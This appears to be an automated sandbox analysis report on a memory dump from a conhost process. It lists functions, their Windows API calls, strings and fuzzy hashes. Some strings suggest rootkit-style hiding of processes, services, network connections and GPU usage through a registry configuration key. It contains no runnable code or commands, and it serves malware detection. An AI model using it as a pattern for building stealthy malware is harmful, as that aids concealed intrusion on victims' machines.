Part of subcall function 00000166BE491724: RegOpenKeyExW.ADVAPI32 ref: 00000166BE4917DB
Part of subcall function 00000166BE491724: RegCloseKey.ADVAPI32 ref: 00000166BE4917F5
Part of subcall function 00000166BE491724: RegOpenKeyExW.ADVAPI32 ref: 00000166BE491815
Part of subcall function 00000166BE491724: RegCloseKey.ADVAPI32 ref: 00000166BE491830
Part of subcall function 00000166BE491724: RegOpenKeyExW.ADVAPI32 ref: 00000166BE491850
Part of subcall function 00000166BE491724: RegCloseKey.ADVAPI32 ref: 00000166BE49186B
Part of subcall function 00000166BE491724: RegOpenKeyExW.ADVAPI32 ref: 00000166BE49188B
Part of subcall function 00000166BE491724: RegCloseKey.ADVAPI32 ref: 00000166BE4918A6
Part of subcall function 00000166BE491724: RegOpenKeyExW.ADVAPI32 ref: 00000166BE4918C6

SleepEx.KERNELBASE ref: 00000166BE491BDF

Part of subcall function 00000166BE491724: RegCloseKey.ADVAPI32 ref: 00000166BE4918E1
Part of subcall function 00000166BE491724: RegOpenKeyExW.ADVAPI32 ref: 00000166BE491901
Part of subcall function 00000166BE491724: RegCloseKey.ADVAPI32 ref: 00000166BE49191C
Part of subcall function 00000166BE491724: RegOpenKeyExW.ADVAPI32 ref: 00000166BE49193C
Part of subcall function 00000166BE491724: RegCloseKey.ADVAPI32 ref: 00000166BE491957
Part of subcall function 00000166BE491724: RegOpenKeyExW.ADVAPI32 ref: 00000166BE491977
Part of subcall function 00000166BE491724: RegCloseKey.ADVAPI32 ref: 00000166BE491992
Part of subcall function 00000166BE491724: RegCloseKey.ADVAPI32 ref: 00000166BE49199C

Memory Dump Source

Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true

Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd

Similarity

API ID: CloseOpen$Heap$AllocProcessSleep
String ID:
API String ID: 948135145-0
Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction ID: fd8c7f75c0b60f0fd735319605552630c65d66dcf015af5ba2bdb791d6551c9a
Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction Fuzzy Hash: 6231EA7D300A51C9FB54AB26DF413E923A4AF8ABD0F1658219E1AE7797DE36C850C218

Non-executed Functions

Function 00000166BE492FF0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 00000166BE493094
lstrlenW.KERNEL32 ref: 00000166BE4932BE

Part of subcall function 00000166BE491A30: OpenProcess.KERNEL32 ref: 00000166BE491A56
Part of subcall function 00000166BE491A30: K32GetModuleFileNameExW.KERNEL32 ref: 00000166BE491A74
Part of subcall function 00000166BE491A30: PathFindFileNameW.SHLWAPI ref: 00000166BE491A83
Part of subcall function 00000166BE491A30: lstrlenW.KERNEL32 ref: 00000166BE491A8F
Part of subcall function 00000166BE491A30: StrCpyW.SHLWAPI ref: 00000166BE491AA2
Part of subcall function 00000166BE491A30: CloseHandle.KERNEL32 ref: 00000166BE491AB0

GetProcAddress.KERNEL32 ref: 00000166BE4930A9

Part of subcall function 00000166BE493F88: StrCmpNIW.SHLWAPI(?,?,?,00000166BE49272F), ref: 00000166BE493FA0

StrCmpNIW.SHLWAPI ref: 00000166BE4930EC
lstrlenW.KERNEL32 ref: 00000166BE493214

Strings

ntdll.dll, xrefs: 00000166BE49308D
NtQueryObject, xrefs: 00000166BE49309F
\Device\Nsi, xrefs: 00000166BE4930DF

Memory Dump Source

Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true

Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction ID: 561070e86f55dd75a59d82426419ebb0a8ac24a22321aef90a4578fc182b6dd7
Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction Fuzzy Hash: A5B17E3A310690CAEB658F25DE047EAA3A5FB86BD5F445016EE09E3B96DF36CD40C740

Function 00000166BE4984B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00000166BE4984CC
RtlCaptureContext.NTDLL ref: 00000166BE4984F9
RtlLookupFunctionEntry.NTDLL ref: 00000166BE498513
RtlVirtualUnwind.NTDLL ref: 00000166BE498554
IsDebuggerPresent.KERNEL32 ref: 00000166BE4985A8
SetUnhandledExceptionFilter.KERNEL32 ref: 00000166BE4985C5
UnhandledExceptionFilter.KERNEL32 ref: 00000166BE4985D0

Memory Dump Source

Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true

Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction ID: 4ae9e79a8873629d9d1b332e5f4339e944e085aa3c287e476b829f00ce75d21d
Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction Fuzzy Hash: 4C317E76305B80DAEB608F64EC403EE7364F788794F44402ADA4E97B99EF79C648CB10

Function 00000166BE49CD80 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 00000166BE49CE0B
RtlLookupFunctionEntry.NTDLL ref: 00000166BE49CE23
RtlVirtualUnwind.NTDLL ref: 00000166BE49CE5E
IsDebuggerPresent.KERNEL32 ref: 00000166BE49CE97
SetUnhandledExceptionFilter.KERNEL32 ref: 00000166BE49CEA1
UnhandledExceptionFilter.KERNEL32 ref: 00000166BE49CEAC

Memory Dump Source

Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true

Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction ID: 85ba845a2acfbb1560f5fe6f3a2bbcce4c1bc2d016153d01daa8d5c97245836f
Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction Fuzzy Hash: 2F412936314B80DAEB60CB25EC403DE73A4F7887A4F540225EA9D97B99DF79C555CB00

Function 00000166BE49DA18 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 00000166BE49DB99
FindNextFileW.KERNEL32 ref: 00000166BE49DCCF
FindClose.KERNEL32 ref: 00000166BE49DD0F
FindClose.KERNEL32 ref: 00000166BE49DD3B

Memory Dump Source

Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true

Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction ID: 574c1045bfab0f6feb1be90c69e3005a9ceca5faf5218fcae4327c0d8558d306
Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction Fuzzy Hash: 50A1E536704681CDFB20DB75EE803ED6BA1E781BE4F144115DE99BBA9ADB3AC441C700

Function 00000166BE491724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00000166BE49172F
HeapAlloc.KERNEL32 ref: 00000166BE49173E

Part of subcall function 00000166BE491264: GetProcessHeap.KERNEL32 ref: 00000166BE49126A
Part of subcall function 00000166BE491264: HeapAlloc.KERNEL32 ref: 00000166BE491279
Part of subcall function 00000166BE491264: GetProcessHeap.KERNEL32 ref: 00000166BE491293
Part of subcall function 00000166BE491264: HeapAlloc.KERNEL32 ref: 00000166BE4912A4

Part of subcall function 00000166BE491000: GetProcessHeap.KERNEL32 ref: 00000166BE491006
Part of subcall function 00000166BE491000: HeapAlloc.KERNEL32 ref: 00000166BE491015
Part of subcall function 00000166BE491000: GetProcessHeap.KERNEL32 ref: 00000166BE491028
Part of subcall function 00000166BE491000: HeapAlloc.KERNEL32 ref: 00000166BE491037

RegOpenKeyExW.ADVAPI32 ref: 00000166BE4917AE
RegOpenKeyExW.ADVAPI32 ref: 00000166BE4917DB
RegCloseKey.ADVAPI32 ref: 00000166BE4917F5
RegOpenKeyExW.ADVAPI32 ref: 00000166BE491815
RegCloseKey.ADVAPI32 ref: 00000166BE491830
RegOpenKeyExW.ADVAPI32 ref: 00000166BE491850
RegCloseKey.ADVAPI32 ref: 00000166BE49186B
RegOpenKeyExW.ADVAPI32 ref: 00000166BE49188B
RegCloseKey.ADVAPI32 ref: 00000166BE4918A6
RegOpenKeyExW.ADVAPI32 ref: 00000166BE4918C6
RegCloseKey.ADVAPI32 ref: 00000166BE4918E1
RegOpenKeyExW.ADVAPI32 ref: 00000166BE491901
RegCloseKey.ADVAPI32 ref: 00000166BE49191C
RegOpenKeyExW.ADVAPI32 ref: 00000166BE49193C
RegCloseKey.ADVAPI32 ref: 00000166BE491957
RegOpenKeyExW.ADVAPI32 ref: 00000166BE491977
RegCloseKey.ADVAPI32 ref: 00000166BE491992
RegCloseKey.ADVAPI32 ref: 00000166BE49199C

Part of subcall function 00000166BE4912B8: RegQueryInfoKeyW.ADVAPI32 ref: 00000166BE491315
Part of subcall function 00000166BE4912B8: GetProcessHeap.KERNEL32 ref: 00000166BE491323
Part of subcall function 00000166BE4912B8: HeapAlloc.KERNEL32 ref: 00000166BE491334
Part of subcall function 00000166BE4912B8: RegEnumValueW.ADVAPI32 ref: 00000166BE491393
Part of subcall function 00000166BE4912B8: GetProcessHeap.KERNEL32 ref: 00000166BE4913DB
Part of subcall function 00000166BE4912B8: HeapAlloc.KERNEL32 ref: 00000166BE4913E9
Part of subcall function 00000166BE4912B8: GetProcessHeap.KERNEL32 ref: 00000166BE491406
Part of subcall function 00000166BE4912B8: HeapFree.KERNEL32 ref: 00000166BE491414
Part of subcall function 00000166BE4912B8: lstrlenW.KERNEL32 ref: 00000166BE49141D
Part of subcall function 00000166BE4912B8: GetProcessHeap.KERNEL32 ref: 00000166BE49142B
Part of subcall function 00000166BE4912B8: HeapAlloc.KERNEL32 ref: 00000166BE491439

Strings

service_names, xrefs: 00000166BE4918BF
process_names, xrefs: 00000166BE491849
paths, xrefs: 00000166BE491884
pid, xrefs: 00000166BE49180E
udp, xrefs: 00000166BE491970
startup, xrefs: 00000166BE4917D1
tcp_remote, xrefs: 00000166BE491935
tcp_local, xrefs: 00000166BE4918FA
SOFTWARE\$cnt-config, xrefs: 00000166BE49178E

Memory Dump Source

Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true

Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\$cnt-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-2609720707
Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction ID: 8de483516d2ad70ab3e8ba4cd151b213d3391736beea3786faf10fd88ccfc07a
Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction Fuzzy Hash: 36710C3A750A50CAEB109F65ED906DD23A4FB85BDCF412121DE4EA7B69DF3AC444C740

Function 00000166BE4912B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000166BE491315
GetProcessHeap.KERNEL32 ref: 00000166BE491323
HeapAlloc.KERNEL32 ref: 00000166BE491334
RegEnumValueW.ADVAPI32 ref: 00000166BE491393

Part of subcall function 00000166BE491530: StrCmpIW.SHLWAPI ref: 00000166BE491561

GetProcessHeap.KERNEL32 ref: 00000166BE4913DB
HeapAlloc.KERNEL32 ref: 00000166BE4913E9
GetProcessHeap.KERNEL32 ref: 00000166BE491406
HeapFree.KERNEL32 ref: 00000166BE491414
lstrlenW.KERNEL32 ref: 00000166BE49141D
GetProcessHeap.KERNEL32 ref: 00000166BE49142B
HeapAlloc.KERNEL32 ref: 00000166BE491439
StrCpyW.SHLWAPI ref: 00000166BE49145B
GetProcessHeap.KERNEL32 ref: 00000166BE491472
HeapFree.KERNEL32 ref: 00000166BE491480

Strings

d, xrefs: 00000166BE491356

Memory Dump Source

Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true

Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction ID: 4bd5dae956d677d2360586ccdc672ba4e612c2510c0a820f297e60f8a0a1cddb
Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction Fuzzy Hash: B5512B36714B84DAE724CF62EE483AAB7A2F789FD8F444124DA4A87758DF3DD0458B00

Function 00000166BE49EF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,00000100,00000000,00000166BE49F34A,?,?,00000000,00000166BE49F2CD), ref: 00000166BE49EFF5
GetLastError.KERNEL32(?,?,00000000,00000166BE49F2CD), ref: 00000166BE49F007
LoadLibraryExW.KERNEL32(?,?,00000000,00000166BE49F2CD), ref: 00000166BE49F049
VirtualProtect.KERNEL32 ref: 00000166BE49F0A5
VirtualProtect.KERNEL32 ref: 00000166BE49F0D6
FreeLibrary.KERNEL32(?,?,00000000,00000166BE49F2CD), ref: 00000166BE49F11A
GetProcAddress.KERNEL32(?,?,00000000,00000166BE49F2CD), ref: 00000166BE49F126

Strings

api-ms-, xrefs: 00000166BE49F01B
AppPolicyGetProcessTerminationMethod, xrefs: 00000166BE49F157, 00000166BE49F165
ext-ms-, xrefs: 00000166BE49F02E

Memory Dump Source

Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true

Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd

Similarity

API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
API String ID: 740688525-1880043860
Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction ID: af850c23804337fb4d43cdd508c3f337783aad8708ffbdb147fc4742956e1e5a
Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction Fuzzy Hash: F051A035701B44D9EA249BA6AE003EA2290BB48BF0F5817359E3D977D2DF3AD845C640

Function 00000166BE4933A8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PdhGetCounterInfoW.PDH ref: 00000166BE4933FD
GetProcessHeap.KERNEL32 ref: 00000166BE493412
HeapAlloc.KERNEL32 ref: 00000166BE493420
PdhGetCounterInfoW.PDH ref: 00000166BE493436
StrCmpW.SHLWAPI ref: 00000166BE49344B

Part of subcall function 00000166BE493950: StrCmpNW.SHLWAPI ref: 00000166BE493972
Part of subcall function 00000166BE493950: StrStrW.SHLWAPI ref: 00000166BE493990
Part of subcall function 00000166BE493950: StrToIntW.SHLWAPI ref: 00000166BE4939B7

GetProcessHeap.KERNEL32 ref: 00000166BE493488
HeapFree.KERNEL32 ref: 00000166BE493496

Strings

\GPU Engine(*)\Running Time, xrefs: 00000166BE493444

Memory Dump Source

Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true

Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Running Time
API String ID: 1943346504-1805530042
Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction ID: 7a7c65d7e3649bd5c972ce1a3872868317140ced5d5015e5133e9c77956c8a0c
Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction Fuzzy Hash: 3531D236B00A40EAE721CF13AE047D9A3A0F7C9FD6F450525DE4993625DF3DD8568740

Function 00000166BE4934B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PdhGetCounterInfoW.PDH ref: 00000166BE493516
GetProcessHeap.KERNEL32 ref: 00000166BE493527
HeapAlloc.KERNEL32 ref: 00000166BE493535
PdhGetCounterInfoW.PDH ref: 00000166BE49354B
StrCmpW.SHLWAPI ref: 00000166BE493560

Part of subcall function 00000166BE493950: StrCmpNW.SHLWAPI ref: 00000166BE493972
Part of subcall function 00000166BE493950: StrStrW.SHLWAPI ref: 00000166BE493990
Part of subcall function 00000166BE493950: StrToIntW.SHLWAPI ref: 00000166BE4939B7

GetProcessHeap.KERNEL32 ref: 00000166BE49358D
HeapFree.KERNEL32 ref: 00000166BE49359B

Strings

\GPU Engine(*)\Utilization Percentage, xrefs: 00000166BE493559

Memory Dump Source

Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true

Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Utilization Percentage
API String ID: 1943346504-3507739905
Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction ID: 929066317cb247bd81c39ea5e9c8fd590d08d581e77d694c5d65ab026869f518
Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction Fuzzy Hash: 30318935B10B41DAEB10DF22AE8479A63A1FBC9FE5F4450259E4AD3725EE39D441C700

Function 00000166BE49A22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00000166BE49A289

Part of subcall function 00000166BE49B144: __GetUnwindTryBlock.LIBCMT ref: 00000166BE49B187
Part of subcall function 00000166BE49B144: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00000166BE49B1AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00000166BE49A361
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00000166BE49A5AF
std::bad_alloc::bad_alloc.LIBCMT ref: 00000166BE49A6BC

Strings

csm, xrefs: 00000166BE49A30A
csm, xrefs: 00000166BE49A384
csm, xrefs: 00000166BE49A2A3

Memory Dump Source

Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true

Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction ID: f5fcb79197fb1821e5c1190ebf7ca691809633bbe2d4fefc0a563e707d9e2a8e
Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction Fuzzy Hash: 3FD17A3A704780CEEB60DF699E453DD77A0F7897D8F100215EA89A7B9ACB3AC484D700

Function 00000166BBF7962C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00000166BBF79689

Part of subcall function 00000166BBF7A544: __GetUnwindTryBlock.LIBCMT ref: 00000166BBF7A587
Part of subcall function 00000166BBF7A544: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00000166BBF7A5AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00000166BBF79761
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00000166BBF799AF
std::bad_alloc::bad_alloc.LIBCMT ref: 00000166BBF79ABC

Strings

csm, xrefs: 00000166BBF796A3
csm, xrefs: 00000166BBF79784
csm, xrefs: 00000166BBF7970A

Memory Dump Source

Source File: 00000016.00000003.1886349302.00000166BBF70000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000166BBF70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_3_166bbf70000_conhost.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction ID: 96ec39e6920fa117b4d47788cf550bb171a733e85bd1ade17c2eda62e1e750a2
Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction Fuzzy Hash: 45D19A3A600780DAEB30DF66D8813ED77A8F789788F105155EE8997B9ADFB6C091C700

Function 00000166BE49104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99
memoryregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000166BE4910B1
RegEnumValueW.ADVAPI32 ref: 00000166BE491117
GetProcessHeap.KERNEL32 ref: 00000166BE49115A
HeapAlloc.KERNEL32 ref: 00000166BE491168
GetProcessHeap.KERNEL32 ref: 00000166BE491185
HeapFree.KERNEL32 ref: 00000166BE491193

Strings

d, xrefs: 00000166BE4910D6

Memory Dump Source

